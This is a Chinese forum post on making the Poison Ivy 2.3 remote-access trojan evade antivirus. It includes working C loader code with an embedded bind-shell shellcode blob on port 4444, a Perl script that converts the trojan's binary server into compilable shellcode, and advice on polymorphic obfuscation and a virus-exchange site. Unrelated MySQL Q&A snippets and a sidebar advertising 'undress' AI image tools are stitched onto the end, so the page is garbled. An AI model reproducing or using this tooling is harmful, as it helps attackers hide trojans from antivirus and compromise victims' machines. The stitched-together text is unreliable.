文章作者:mika[EST] 今天在国外的IRC里看到有几个老外在讨论PI2.3的免杀,由于PI2.3的对齐方式跟过去的不太一样导致使用加壳程序处理后不能正常运行,所以它的免杀成了大家关注的对象了。于是乎俺下载了一个试了试,加过壳后的确不能运行了。可是由于PI2.3
文章作者:mika[EST]
今天在国外的IRC里看到有几个老外在讨论PI2.3的免杀,由于PI2.3的对齐方式跟过去的不太一样导致使用加壳程序处理后不能正常运行,所以它的免杀成了大家关注的对象了。于是乎俺下载了一个试了试,加过壳后的确不能运行了。可是由于PI2.3新增的功能支持shellcode生成,那就好办多了啊!shellcode我懂啊,变形我也懂啊,那免杀还不容易了吗?
PI2.3支持生成二进制格式的数据,C格式的shellcode,delphi格式的shellcode,perl格式的和python格式的。由于俺比较熟悉C格式的,所以就拿它来讨论一下吧
搞过溢出的哥哥姐姐弟弟妹妹们都知道,shellcode变形是编写exploit非常重要的一个环节,因此把它应用到免杀上来,理论上是既可以过文件免杀又可以过内存免杀的(当然,单纯的xor变形是不过内存的,需要对shellcode添加garbage code(垃圾代码)进行混淆才行)。
关于变形的思路那可就多了,估计这一个帖子是说不清楚的。有兴趣的朋友可以去一些比较著名的病毒站点查找,我这里推荐一个吧:http://vx.netlux.org。这个站有很多现成的变形工具可以用,自己拿去研究了(在病毒里,这种变形属于polymorphic
engine的一种)。
我这里大体说说思路吧,如果你使用的是别人编写好的polymorphic engine进行变形,而且支持shellcode格式输出的话(就是上面说的c或者delphi等格式的输出),那么你在用PI 2.3.0生成服务端的时候选择binary生成方式即可。这样生成出的就是二进制代码,然后用你的poly engine变形即可(这样的工具有tapion 1.0c,在我上面说的那个站可以找到)。
或者直接手工变形(哇噻,这个好麻烦滴但是作为一种思路俺在这里也提出来),方法简单的说一下吧,先手工添加garbage code(就跟添花指令一个概念),然后再变形(比如xor了等等),这种方式的好处是即使再被杀那么修改起来方便些,缺点不用说了就是第一次太麻烦了(不推荐哦)
再就是分段变形,意思是说一段一段的变形,然后把每个段再重新组合起来(以不同的顺序,当然原来的执行顺行不能变,因此需要添加代码把这些段连接起来),每一段的形式类似这样的:
decrpytor(解码头)+encrpyted code(变形后的代码)+link code(连接其它段的代码)。这种方式是最最最最麻烦的,但是变形强度是最最最最高的
看到这里和我一样的菜鸟们有可能就郁闷了,这么麻烦还要不要人活了啊嘿嘿~~~俺其实是在这摆方法嘛,所以俺能想到的都要说说,刚才是说的麻烦的。现在说个简单的(应该是非常简单的,别说俺卖关子啊)。
其实,我们最简单的方法可以这样做,把生成的shellcode变成一个pe格式的文件,不就可以用加壳工具处理了吗?
比如你生成的是C的shellcode格式,那么你可以用下面这个代码生成出一个PE文件来:
CODE:
#include
#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
unsigned char PIshellcode[] ="\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
lea eax,PIshellcode
call eax
}
return 1;
}
void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}
上面的shellcode是绑定本地端口4444的,用你生成的PI的shellcode替换就可以了。编译成功后的程序你就可以用加壳工具来处理了(你所能想到的免杀方法应该都可以用上了)。
上面我考虑到了体积的问题,所以尽量减少了体积(当然肯定还能再减哦,但是俺能想到就这些了)
最初提到的shellcode变形,最后也要用上面的程序生成PE文件,只不过不用再用工具处理了
为了方便大家从bin格式的文件生成文本格式的shellcode,而且方便大家生成上面的C代码,我写了一个perl脚本用来帮助大家生成perl和c格式的shellcode,代码如下:
CODE:
#!/usr/bin/perl
#written by mika[EST]
use strict;
my $BinName=shift || die "Usage: $0
my $bindata;
open(BF, "
$bindata = join('',
close(BF);
print "+ Length: " . length($bindata) . " bytes\n";
print "+ Generating Perl shellcode file ".$BinName.".pl ...";
my $buffer = BufferPerl($bindata);
open(PF,">$BinName.pl");
print PF "my \$PlShellcode=".$buffer;
close(PF);
print "Done"."\n";
print "+ Generating C shellcode file ".$BinName.".cpp...";
$buffer = BufferC($bindata);
my $C_shellcode;
while() { $C_shellcode .= $_; }
$C_shellcode =~ s/::SHELLCODE::/$buffer/g;
open(CF, ">$BinName.cpp");
print CF $C_shellcode;
close (CF);
print " Done"."\n";
sub BufferPerl
{
my ($data, $width) = @_;
my ($res, $count);
if (! $data) { return }
if (! $width) { $width = 16 }
$res = '"';
$count = 0;
foreach my $char (split(//, $data))
{
if ($count == $width)
{
$res .= '".' . "\n" . '"';
$count = 0;
}
$res .= sprintf("\\x%.2x",
ord($char));
$count++;
}
if ($count) { $res .= '";' . "\n"; }
return $res;
}
sub BufferC
{
my ($data, $width) = @_;
my $res = BufferPerl($data, $width);
if (! $res) { return }
$res =~ s/\.//g;
return $res;
}
__DATA__
#include
#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
char PIshellCode[] =
::SHELLCODE::
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
lea eax,PIshellcode
call eax
}
return 1;
}
void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}
这个程序使用很简单,比如你在生成PI 2.3.0的服务端的时候选择生成binary格式,比如叫test.bin。把test.bin复制到这个perl程序同一目录里,然后在cmd下输入:
perl bin2shellcode.pl test
就可以了(不要.bin后缀),这样程序会在同目录下生成两个文件,一个是.pl后缀的perl文件,里面就是perl格式的shellcode,另一个就是.cpp后缀的C++文件,里面不光有生成好的shellcode而且程序直接帮你生成好了一个c++程序,你直接拿到VC下编译即可,生成的cpp文件内容如下:
CODE:
#include
#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
char PIshellCode[] =
"\x55\x8b\xec\x81\xc4\x3c\xf2\xff\xff\x60\x33\xc0\x8d\xbd\x90\xf2"
"\xff\xff\xb9\x5b\x0d\x00\x00\xf3\xaa\x33\xc0\x8d\xbd\x4c\xf2\xff"
"\xff\xb9\x44\x00\x00\x00\xf3\xaa\xc7\x85\xb9\xf3\xff\xff\xe6\x00"
//...........................省略shellcode若干
"\x04\x00\x74\x65\x73\x74\xf9\x0b\x04\x00\x74\x65\x6d\x70\x90\x01"
"\x0d\x00\x09\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x00\x84\x0d\x8c"
"\x01\x04\x00\x00\x00\x00\x00\xc1\x02\x04\x00\xff\xff\xff\xff\x45"
"\x01\x05\x00\x61\x64\x6d\x69\x6e\xfb\x03\x09\x00\x29\x21\x56\x6f"
"\x71\x41\x2e\x49\x34\x00\x00\x00\x00";
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
lea eax,PIshellcode
call eax
}
return 1;
}
void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
What are the differences in syntax between MySQL and other SQL dialects?Apr 27, 2025 am 12:26 AMMySQLdiffersfromotherSQLdialectsinsyntaxforLIMIT,auto-increment,stringcomparison,subqueries,andperformanceanalysis.1)MySQLusesLIMIT,whileSQLServerusesTOPandOracleusesROWNUM.2)MySQL'sAUTO_INCREMENTcontrastswithPostgreSQL'sSERIALandOracle'ssequenceandt
What is MySQL partitioning?Apr 27, 2025 am 12:23 AMMySQL partitioning improves performance and simplifies maintenance. 1) Divide large tables into small pieces by specific criteria (such as date ranges), 2) physically divide data into independent files, 3) MySQL can focus on related partitions when querying, 4) Query optimizer can skip unrelated partitions, 5) Choosing the right partition strategy and maintaining it regularly is key.
How do you grant and revoke privileges in MySQL?Apr 27, 2025 am 12:21 AMHow to grant and revoke permissions in MySQL? 1. Use the GRANT statement to grant permissions, such as GRANTALLPRIVILEGESONdatabase_name.TO'username'@'host'; 2. Use the REVOKE statement to revoke permissions, such as REVOKEALLPRIVILEGESONdatabase_name.FROM'username'@'host' to ensure timely communication of permission changes.
Explain the differences between InnoDB and MyISAM storage engines.Apr 27, 2025 am 12:20 AMInnoDB is suitable for applications that require transaction support and high concurrency, while MyISAM is suitable for applications that require more reads and less writes. 1.InnoDB supports transaction and bank-level locks, suitable for e-commerce and banking systems. 2.MyISAM provides fast read and indexing, suitable for blogging and content management systems.
What are the different types of JOINs in MySQL?Apr 27, 2025 am 12:13 AMThere are four main JOIN types in MySQL: INNERJOIN, LEFTJOIN, RIGHTJOIN and FULLOUTERJOIN. 1.INNERJOIN returns all rows in the two tables that meet the JOIN conditions. 2.LEFTJOIN returns all rows in the left table, even if there are no matching rows in the right table. 3. RIGHTJOIN is contrary to LEFTJOIN and returns all rows in the right table. 4.FULLOUTERJOIN returns all rows in the two tables that meet or do not meet JOIN conditions.
What are the different storage engines available in MySQL?Apr 26, 2025 am 12:27 AMMySQLoffersvariousstorageengines,eachsuitedfordifferentusecases:1)InnoDBisidealforapplicationsneedingACIDcomplianceandhighconcurrency,supportingtransactionsandforeignkeys.2)MyISAMisbestforread-heavyworkloads,lackingtransactionsupport.3)Memoryengineis
What are some common security vulnerabilities in MySQL?Apr 26, 2025 am 12:27 AMCommon security vulnerabilities in MySQL include SQL injection, weak passwords, improper permission configuration, and unupdated software. 1. SQL injection can be prevented by using preprocessing statements. 2. Weak passwords can be avoided by forcibly using strong password strategies. 3. Improper permission configuration can be resolved through regular review and adjustment of user permissions. 4. Unupdated software can be patched by regularly checking and updating the MySQL version.
How can you identify slow queries in MySQL?Apr 26, 2025 am 12:15 AMIdentifying slow queries in MySQL can be achieved by enabling slow query logs and setting thresholds. 1. Enable slow query logs and set thresholds. 2. View and analyze slow query log files, and use tools such as mysqldumpslow or pt-query-digest for in-depth analysis. 3. Optimizing slow queries can be achieved through index optimization, query rewriting and avoiding the use of SELECT*.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Atom editor mac version download
The most popular open source editor
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
Dreamweaver CS6
Visual web development tools
SublimeText3 Chinese version
Chinese version, very easy to use
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
